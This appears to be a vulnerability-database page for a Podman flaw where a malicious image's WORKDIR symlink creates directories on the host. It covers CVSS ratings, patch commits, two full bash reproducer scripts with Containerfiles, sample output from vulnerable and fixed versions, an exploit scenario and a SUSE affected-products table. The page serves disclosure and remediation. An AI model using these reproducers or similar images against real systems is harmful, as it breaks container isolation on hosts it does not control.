Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Local execution of the container image is required (AV:L, PR:L); host filesystem modification outside the container boundary constitutes a scope change (S:C); impact is integrity-only directory creation (I:L, C:N, A:N).
AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
Primary rating from Vendor (https://github.com/podman-container-tools/podman).
CVSS VectorVendor: https://github.com/podman-container-tools/podman
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Lifecycle Timeline
2DescriptionCVE.org
Summary
Running a malicous container image where the WORKDIR path contains a symlink can create a directory or modify ownership on the host filesystem. Modified ownership is less likely to happen as that requires help from an untrusted/malicious process that mutates the host filesystem tree during dereferencing of the WORKDIR path, to trigger a race condition.
Patch
https://github.com/podman-container-tools/podman/commit/d18e44e9abb3bf5b7294aa70806e1368fdddfdd0
Details
This issue was fixed in podman 5.7.1 (git commit 7ce2e00ab140c11a68301f0b161f51984131a858)
PoC
The reproducer script _test1.bash_ demonstrates the vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /var/BREAKOUT as current working directory.
The reproducer script _test2.bash_ demonstrates the same vulnerability. The directory /var/BREAKOUT is created on the host. The container process uses the container directory /usr/local as current working directory.
The reproducer script _test2.bash_ shows that the working directory can be different from the breakout directory.
Reproducer test1.bash
#!/bin/bash
set -o errexit
set -o nounset
if [ -e /var/BREAKOUT ]; then
echo error: path /var/BREAKOUT should not exist beforehand
exit 1
fi
dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
RUN cd / && ln -s ../../../../../../../var symlink
USER 1234:1234
WORKDIR /symlink/BREAKOUT
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF
podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUTReproducer test2.bash
#!/bin/bash
set -o errexit
set -o nounset
if [ -e /var/BREAKOUT ]; then
echo error: path /var/BREAKOUT should not exist beforehand
exit 1
fi
dir=$(mktemp -d)
cat > $dir/Containerfile << 'EOF'
FROM docker.io/library/alpine
ARG breakout_dirname=/var
ARG breakout_basename=BREAKOUT
ARG produce_pwd=/usr/local
RUN mkdir -p /0/1/2/3 && \
cd /0 && \
ln -s 1/2/3 symlink1 && \
mkdir -p /0/1/symlink2/${breakout_dirname} && \
cd /0/1/symlink2/${breakout_dirname} && \
ln -s ${produce_pwd} ${breakout_basename}
RUN cd / && ln -s ../../../../../../.. symlink2
USER 1234:1234
WORKDIR /0/symlink1/../../symlink2/${breakout_dirname}/${breakout_basename}
CMD ["/bin/sh","-c","echo current working directory: $(pwd)"]
EOF
podman build -q --no-cache -t img $dir
podman run --rm localhost/img
ls -ld /var/BREAKOUTVulnerable:
podman 5.7.0 using Fedora CoreOS 43.20251120.3.0
root@localhost:~
# bash test1.bash
38c27b69c61941741f49c3f87b589b422391d5908659665cabf248934be0ed80
current working directory: /var/BREAKOUT
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUT
root@localhost:~
# rmdir /var/BREAKOUT/
root@localhost:~
# bash test2.bash
c3390edbe393a3f3b182e60c5900cf93444b5120fbe34dc305478b3b77a106c9
current working directory: /usr/local
drwxr-xr-x. 2 1234 1234 6 May 29 19:28 /var/BREAKOUTNot vulnerable:
podman 5.7.1 using Fedora CoreOS 43.20260119.1.1
root@localhost:~
# bash test1.bash
0229bf752a821d5b9bb8afcf4b94e8de2a4838798ae8065414b7f939b81d0788
current working directory: /var/BREAKOUT
ls: cannot access '/var/BREAKOUT': No such file or directory
root@localhost:~
# bash test2.bash
568584150a93a003feb8ae1985173bf50ced9cba4d52f9734cb70dc75eeb7c60
current working directory: /usr/local
ls: cannot access '/var/BREAKOUT': No such file or directoryCredits
We like to thank Erik Sjölund (@eriksjolund) for reporting the security impact to us.
AnalysisAI
WORKDIR symlink traversal in Podman allows a malicious container image to create arbitrary directories - and under a race condition, modify ownership - directly on the host filesystem, breaking container isolation. Affected versions include Podman v5 through 5.7.0, v4 through 4.9.5, and v3 through 3.4.7; the flaw is in the WORKDIR path resolution logic, which fails to confine symlink dereferences to the container's mount namespace. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires that a victim operator executes `podman run` (or an equivalent API call) using a malicious container image where: (1) the Containerfile includes a RUN instruction creating one or more symlinks pointing to a path outside the container root using relative traversal sequences (e.g., `ln -s ../../../../../var symlink`), and (2) the WORKDIR directive resolves through those symlinks to a non-existent target directory on the host. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | Several signals in the provided data conflict and require reconciliation. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes a malicious container image to a public or accessible registry; the image's Containerfile embeds a symlink (e.g., `/symlink -> ../../../../../var`) and sets `WORKDIR /symlink/BREAKOUT`. When an operator or automated CI/CD pipeline runs this image against a vulnerable Podman installation using `podman run`, Podman's WORKDIR resolution follows the symlink chain outside the container root and calls `os.MkdirAll` on `/var/BREAKOUT` directly on the host filesystem. … |
| Remediation | Upgrade to Podman 5.7.1 or later, which replaces the vulnerable symlink resolution logic with `securejoin.SecureJoin()` (patch commits 7ce2e00ab140c11a68301f0b161f51984131a858 and d18e44e9abb3bf5b7294aa70806e1368fdddfdd0, vendor advisory https://github.com/podman-container-tools/podman/security/advisories/GHSA-q6r4-3wmg-fwcq). … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-59 – Improper Link Resolution Before File Access
View allSame technique Information Disclosure
View allVendor StatusVendor
SUSE
Severity: Moderate| Product | Status |
|---|---|
| SUSE Linux Enterprise High Performance Computing 15 SP7 | Affected |
| SUSE Linux Enterprise Micro 5.3 | Affected |
| SUSE Linux Enterprise Micro 5.4 | Affected |
| SUSE Linux Enterprise Micro 5.5 | Affected |
| SUSE Linux Enterprise Module for Containers 15 SP7 | Affected |
| SUSE Linux Enterprise Server 15 SP7 | Affected |
| SUSE Linux Enterprise Server 16.0 | Affected |
| SUSE Linux Enterprise Server 16.1 | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP7 | Affected |
| SUSE Linux Enterprise Server for SAP applications 16.0 | Affected |
| SUSE Linux Enterprise Server for SAP applications 16.1 | Affected |
| SUSE Linux Micro 6.0 | Affected |
| SUSE Linux Micro 6.1 | Affected |
| SUSE Linux Micro 6.2 | Affected |
| openSUSE Leap 16.0 | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP4 | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP5 | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS | Affected |
| SUSE Linux Enterprise Module for Containers 15 SP4 | Affected |
| SUSE Linux Enterprise Module for Containers 15 SP5 | Affected |
| SUSE Linux Enterprise Module for Containers 15 SP6 | Affected |
| SUSE Linux Enterprise Server 15 SP4 | Affected |
| SUSE Linux Enterprise Server 15 SP4-LTSS | Affected |
| SUSE Linux Enterprise Server 15 SP5 | Affected |
| SUSE Linux Enterprise Server 15 SP5-LTSS | Affected |
| SUSE Linux Enterprise Server 15 SP6 | Affected |
| SUSE Linux Enterprise Server 15 SP6-LTSS | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP6 | Affected |
| SUSE Manager Proxy 4.3 | Affected |
| SUSE Manager Retail Branch Server 4.3 | Affected |
| SUSE Manager Server 4.3 | Affected |
| SUSE CaaS Platform 4.0 | Not-Affected |
| SUSE Enterprise Storage 6 | Not-Affected |
| SUSE Enterprise Storage 7 | Not-Affected |
| SUSE Enterprise Storage 7.1 | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP1 | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP1-ESPOS | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP1-LTSS | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2 | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2-ESPOS | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP2-LTSS | Not-Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3 | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3-ESPOS | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP3-LTSS | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS | Affected |
| SUSE Linux Enterprise High Performance Computing 15 SP6 | Affected |
| SUSE Linux Enterprise Micro 5.0 | Not-Affected |
| SUSE Linux Enterprise Micro 5.1 | Affected |
| SUSE Linux Enterprise Micro 5.2 | Affected |
| SUSE Linux Enterprise Module for Containers 15 SP1 | Not-Affected |
| SUSE Linux Enterprise Module for Containers 15 SP2 | Not-Affected |
| SUSE Linux Enterprise Module for Containers 15 SP3 | Affected |
| SUSE Linux Enterprise Module for Package Hub 15 SP5 | Affected |
| SUSE Linux Enterprise Module for Package Hub 15 SP6 | Affected |
| SUSE Linux Enterprise Server 15 SP1 | Not-Affected |
| SUSE Linux Enterprise Server 15 SP1-BCL | Not-Affected |
| SUSE Linux Enterprise Server 15 SP1-LTSS | Not-Affected |
| SUSE Linux Enterprise Server 15 SP2 | Not-Affected |
| SUSE Linux Enterprise Server 15 SP2-BCL | Not-Affected |
| SUSE Linux Enterprise Server 15 SP2-LTSS | Not-Affected |
| SUSE Linux Enterprise Server 15 SP3 | Affected |
| SUSE Linux Enterprise Server 15 SP3-BCL | Affected |
| SUSE Linux Enterprise Server 15 SP3-LTSS | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP1 | Not-Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP2 | Not-Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP3 | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP4 | Affected |
| SUSE Linux Enterprise Server for SAP Applications 15 SP5 | Affected |
| SUSE Manager Proxy 4.0 | Not-Affected |
| SUSE Manager Proxy 4.1 | Not-Affected |
| SUSE Manager Proxy 4.2 | Affected |
| SUSE Manager Retail Branch Server 4.0 | Not-Affected |
| SUSE Manager Retail Branch Server 4.1 | Not-Affected |
| SUSE Manager Retail Branch Server 4.2 | Affected |
| SUSE Manager Server 4.0 | Not-Affected |
| SUSE Manager Server 4.1 | Not-Affected |
| SUSE Manager Server 4.2 | Affected |
| openSUSE Leap 15.3 | Affected |
| openSUSE Leap 15.4 | Affected |
| openSUSE Leap 15.5 | Affected |
| openSUSE Leap 15.5 | Affected |
| openSUSE Leap 15.6 | Affected |
| openSUSE Leap 15.6 | Affected |
| openSUSE Leap Micro 5.2 | Affected |
| openSUSE Leap Micro 5.3 | Affected |
| openSUSE Leap Micro 5.4 | Affected |
| openSUSE Leap Micro 5.5 | Affected |
| SLES-CHOST-BYOS-Aliyun | Affected |
| SLES-CHOST-BYOS-Azure | Affected |
| SLES-CHOST-BYOS-EC2 | Affected |
| SLES-CHOST-BYOS-GCE | Affected |
| SLES-CHOST-BYOS-GDC | Affected |
| SLES-CHOST-BYOS-SAP-CCloud | Affected |
| rancher/elemental-teal-rt/5.4 rancher/elemental-teal/5.4 suse/sle-micro/5.5 | Affected |
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39808
GHSA-q6r4-3wmg-fwcq